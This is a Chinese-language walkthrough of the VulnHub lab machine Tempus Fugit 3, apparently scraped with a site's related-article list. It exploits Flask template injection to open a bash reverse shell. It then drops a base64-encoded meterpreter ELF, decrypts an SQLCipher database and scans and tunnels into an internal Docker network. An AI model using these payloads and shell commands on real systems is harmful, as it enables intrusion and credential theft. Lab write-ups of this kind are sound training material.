当前位置: 首页 > news >正文

从SSTI模板注入到docker容器内网渗透:靶机练习之Tempus_fugit3

靶机提示

sstisqlite文件破解内网渗透容器

靶机下载

https://download.vulnhub.com/tempusfugit/Tempus-Fugit-3.ova

信息搜集

nmap -sT --min-rate 10000 -p- 192.168.8.250

很简单的信息,只有一个web页面

SSTI模板注入漏洞

无意中发现404似乎都是有个统一的拦截页面

{{2*2}}}

直接注入payload,果然存在ssti漏洞

先查看配置,定位服务端模板版本

{{config}}

根据特征推断服务端是flask

同时base64解码拿到第一个flag

flask ssti注入payload

{{ request.application.__globals__.__builtins__.__import__('os').popen('id').read() }}

成功回显

反弹shell

{{ request.application.__globals__.__builtins__.__import__('os').popen('bash -c "/bin/bash -i >& /dev/tcp/192.168.8.251/4444 0>&1"').read() }}

sqlite 数据窃取

app.py文件中发现了第一个flag,以及数据库密码,

pragma key='SecretssecretsSecrets...'

并且用的时sqlite数据库
SQLite 是一个嵌入式的、进程内(in-process)、无服务器、零配置、事务性的 SQL 数据库引擎,它只在本地生成一个文件

顺着app.py源码指示的路径也发现了db文件

sqlite交互

登录

sqlcipher db2.db --interactive

输入密码

PRAGMA key = 'SecretssecretsSecrets...';

hugh-janus|S0secretPassW0rd anita-hanjaab|ssdf%dg5xc clee-torres|asRtesa#2s RmxhZzN7IEhleSwgcmVhZGluZyBzZWNyZXRzICB9|

拿到第三个flag

后台源码泄露


源码里面拿到flag2


提权

想进一步利用时发现,反弹shell是受限的

推断可能是容器shell

拿到shell后无法执行查看网络的命令,同时也没有curl/wget等命令,再联想到端口服务探测时,发现80端口只是nginx服务,猜测可能是docker容器

摆脱受限容器

生成一个不依赖任何运行时(curl/wget/python)的纯二进制后门

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.8.251 LPORT=6666 -f elf -o ex.elf

将 ELF 二进制转为 Base64 文本传输
-w0禁止换行

cat ex.elf| base64 -w0

在靶机生成payload

echo 'f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAAMf9qCViZthBIidZNMclqIkFaagdaDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgAaCsCoCPtRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==' |base64 -d > ex.elf

msf启动监听

拿到meterpreter shell

内网渗透

先拿到内网ip

上传fscan

meterpreter > upload /root/tools/fscan

进入shell

fscan -h 192.168.100.0/24

发现了192.168.100.1

端口扫描

./fscan -h 192.168.100.0/24 -p 1-65535 -t 50

开了34193端口和80端口

端口转发

把内网端口通过ssh隧道转发到kali

ssh -N -R 5555:192.168.100.1:80 root@192.168.8.251

ps靶机环境似乎有问题,卡在这边整了很久,看了一下wp内网的192.168.100.1机器的还有个443端口,但是靶机的443似乎没有启动起来,暂时先这样。

http://www.cnnetsun.cn/news/3199723.html

相关文章:

  • YOLOv8蜜蜂识别检测系统(项目源码+YOLO数据集+模型权重+UI界面+python+深度学习+环境配置+目标检测)
  • 3步掌握WebODM:免费开源的无人机图像处理终极指南
  • 给 Claude Code 布置任务,它为什么总是理解错——我找到原因了
  • Claude API 长上下文处理:应用场景、成本分析与实战指南
  • 图像锐度评分算法实战:基于OpenCV与Python实现自动对焦评价函数
  • OpenBMC:systemd 服务与启动流程
  • Docker程序员零基础入门K8s实战系列(全套8篇CSDN文章大纲·生产终版)
  • 2026网上商城系统开发哪家好? 零技术也能做出的4种方案
  • Balena Etcher终极指南:三步搞定系统启动盘制作,新手也能轻松上手
  • 天幕传媒|本地化综合传媒服务企业,全流程标准化服务体系介绍
  • 【AI大模型进阶】手把手教你读懂“模型卡”:就像看食品配料表一样简单
  • 【院士报告、EI稳定快检索】2026年第七届先进材料与智能制造国际学术会议(ICAMIM 2026)
  • 【K8s 第一篇】Docker程序员零基础入门K8s:集群搭建+Docker对标+环境避坑(保姆级实操)
  • 疯狂Java第2版来了!Java 7新特性全解析,学不会算我输
  • 贵阳水漆木作真的耐用又环保吗?
  • Frida Android环境搭建实战:15分钟搞定逆向分析基础
  • 26下半年PMP备考:别让犹豫吃掉你的窗口期,12月正式启用新考纲
  • joblib vs pickle 模型持久化:3大场景性能对比与 5 倍速度差异实测
  • 圆管坡口机哪款耐用又精准?行业资深用户评价来参考
  • CoRe-MoE:人形机器人多地形自适应步态认知框架
  • 【Java课程设计/毕业设计】基于 SpringBoot 的病历数据统计分析系统的设计与实现 基于前后端分离的智慧医院病历管理系统【附源码、数据库、万字文档】
  • KLayout:芯片设计的开源瑞士军刀,让版图设计变得如此简单
  • 飞书OpenClaw部署实战:构建生产级AI Agent协作团队
  • Java毕业设计-基于前后端分离的养老院健康监护管理系统的设计与实现 基于 SpringBoot 的养老院员工排班管理系统(源码+LW+部署文档+全bao+远程调试+代码讲解等)
  • S7-1200 V4.2 Array of FB 应用:8个电机控制FB实例化与循环调用
  • 什么是运算放大器(运放)
  • Redis——redis和mysql的数据同步
  • AI绘画工具文化细节测试:以白无垢和服生成为例
  • GRAIL:基于3D资产与视频先验的人形机器人运动-操作生成框架
  • Thingsboard - 用户密码设置